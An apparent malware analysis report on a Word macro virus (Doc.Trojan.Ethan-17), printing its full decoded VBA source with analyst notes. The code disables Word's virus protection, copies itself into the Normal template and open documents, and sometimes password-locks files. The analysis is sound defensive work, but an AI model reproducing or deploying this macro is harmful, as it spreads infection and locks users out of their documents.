Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 76a44c6f5a15f135…

MALICIOUS

Office (OLE)

35.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 36c4df1ca749157e731599434b1cacac SHA-1: 2b367a5edd6fb47e981a5dbc0788a5da9ae2fef6 SHA-256: 76a44c6f5a15f1355fe5acd4a866297f579c8ba47fa962e31e800ba5702cc1cc
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. On document close, the macros turn off Word's built-in macro virus protection (Options.VirusProtection) and persist by copying their own source into the Normal template or the active document, staging the code through the temporary file 'c:\windows\temp\wrdtmpa.tmp'. The ClamAV signature also flags this as Doc.Trojan.Ethan-17, indicating a known malicious document.

Heuristics 2

  • ClamAV: Doc.Trojan.Ethan-17 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Ethan-17
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2986 bytes
SHA-256: bd9751a0c573e67741ac0ffd834031f6e869b7f28dc6a9bc2d0c80b1046772c0
Detection
ClamAV: Doc.Trojan.Ethan-17
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header of the ThisDocument class module as exported by olevba.
' VB_Base = "1Normal.ThisDocument" and VB_TemplateDerived = True indicate the module was
' derived from the Normal template, which matches the self-copying behaviour of the Subs below.
' Analyst note: entry point. Document_Close is an auto-executing Word event handler, so
' this runs whenever the infected document (or a document based on an infected Normal
' template) is closed. It weakens Word's safety settings, checks/installs itself into the
' Normal template and the active document (Test_Pritomnosti), runs the payload (Akce) and
' then saves the document so the changes are written to disk.
Private Sub Document_Close()
    ' Presumably prevents the user from interrupting the macro with Ctrl+Break — verify.
    Application.EnableCancelKey = wdCancelDisabled
    With Options
        ' Turns off Word's macro virus warning so later documents open without a prompt.
        .VirusProtection = False
        .AllowFastSave = True
        .BackgroundSave = True
        .CreateBackup = False
        ' Suppresses the "save properties" / "save Normal template" prompts that would
        ' otherwise reveal that the document and Normal.dot were modified.
        .SavePropertiesPrompt = False
        .SaveNormalPrompt = False
    End With
        
    Call Test_Pritomnosti
    Call Akce
    ActiveDocument.Save
    
    End Sub

' Analyst note: "Test_Pritomnosti" is Czech for "presence test". The routine checks whether
' the first line of the first code module of the Normal template and of the active document
' already reads "Private Sub Document_Close()" (the marker for an existing copy of this
' macro) and, if not, installs the macro there. Reading VBProject.VBComponents requires
' programmatic access to the VBA project, which modern Office blocks by default
' ("Trust access to the VBA project object model"); that setting is the primary mitigation.
Private Sub Test_Pritomnosti()
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then _
    Call Instaluj_Do_Sablony
    If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then _
    Call Instaluj_do_Dokumentu
End Sub

' Analyst note: "Instaluj_Do_Sablony" is Czech for "install into template". Copies the macro
' source into the Normal template: Tmp_File first dumps the running module to the temp file,
' then every line of that file is inserted at the top of the Normal template's first code
' module. The temp file is deleted afterwards, so its creation/deletion at
' c:\windows\temp\wrdtmpa.tmp (listed above) is a useful detection artefact.
Private Sub Instaluj_Do_Sablony()
Call Tmp_File
Open "c:\windows\temp\wrdtmpa.tmp" For Input As #1
' Empty staging file: skip the copy but still close and delete it.
If LOF(1) = 0 Then GoTo konec
i = 1
Do While Not EOF(1)
Line Input #1, a
' Inserts at line i, so lines are written in file order ahead of any existing code.
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, a
i = i + 1
Loop
konec:
Close #1
Kill "c:\windows\temp\wrdtmpa.tmp"
End Sub

' Analyst note: "Instaluj_do_Dokumentu" is Czech for "install into document". Identical to
' Instaluj_Do_Sablony except that the target is the active document's first code module,
' which is how a clean document becomes a carrier once it is opened and closed under an
' infected Normal template. Same temp-file path as above.
Private Sub Instaluj_do_Dokumentu()
Call Tmp_File
Open "c:\windows\temp\wrdtmpa.tmp" For Input As #1
' Empty staging file: skip the copy but still close and delete it.
If LOF(1) = 0 Then GoTo konec
i = 1
Do While Not EOF(1)
Line Input #1, a
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines i, a
i = i + 1
Loop
konec:
Close #1
Kill "c:\windows\temp\wrdtmpa.tmp"
End Sub

' Analyst note: writes the complete source of the first code module of MacroContainer (the
' template or document the running macro lives in — confirm against the Word object model)
' to c:\windows\temp\wrdtmpa.tmp, one line per Print. SetAttr with 6 (= hidden 2 + system 4)
' hides the staging file from a casual directory listing; the file is short-lived because
' the callers delete it after reading it back.
Private Sub Tmp_File()
Open "c:\windows\temp\wrdtmpa.tmp" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\windows\temp\wrdtmpa.tmp", 6
End Sub

' Analyst note: "Akce" is Czech for "action" — the payload. It is skipped entirely in
' March and, otherwise, whenever Rnd > 0.4, so it fires on a minority of closes. When it
' runs it sets a document open password ("DArk![FA]") on the active document, rewrites the
' summary properties (title/author/keywords) via the File Summary Info dialog, clears the
' default save format and saves. The password is effectively a denial-of-access payload:
' the user can no longer open the document without it.
Private Sub Akce()
Dim Mesic, rok
' Mesic = "month", rok = "year" (Czech); rok is assigned but never read.
Mesic = Month(Date)
rok = Year(Date)
If (Mesic = 3) Then GoTo konec   'Brezen mesic internetu - March is month of internet!
   ' Rnd is uniform in [0, 1), so the payload continues only when Rnd <= 0.4.
   If Rnd > 0.4 Then GoTo konec
      
    With ActiveDocument
        ' Open password set; write password cleared.
        .Password = "DArk![FA]"
        .WritePassword = ""
    End With
    
    ' Fills the built-in summary-info dialog and applies it without showing it to the user.
    With Dialogs(wdDialogFileSummaryInfo): _
        .Title = "Easter  Surprise v1.1": _
        .Author = "DArk!, ISŠE": _
        .Keywords = "CZECH MADE!": _
        .Execute
    End With
    ' Empty string presumably resets the default save format to Word's native format — verify.
    Application.DefaultSaveFormat = ""
    ActiveDocument.Save

konec:

End Sub















Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: this appears to be a second copy of the same module header; the preview
' repeats the listing from here and is truncated below.
Private Sub Document_Close()
    Application.EnableCancelKey = wdCancelDisabled
    With Options
        .VirusProte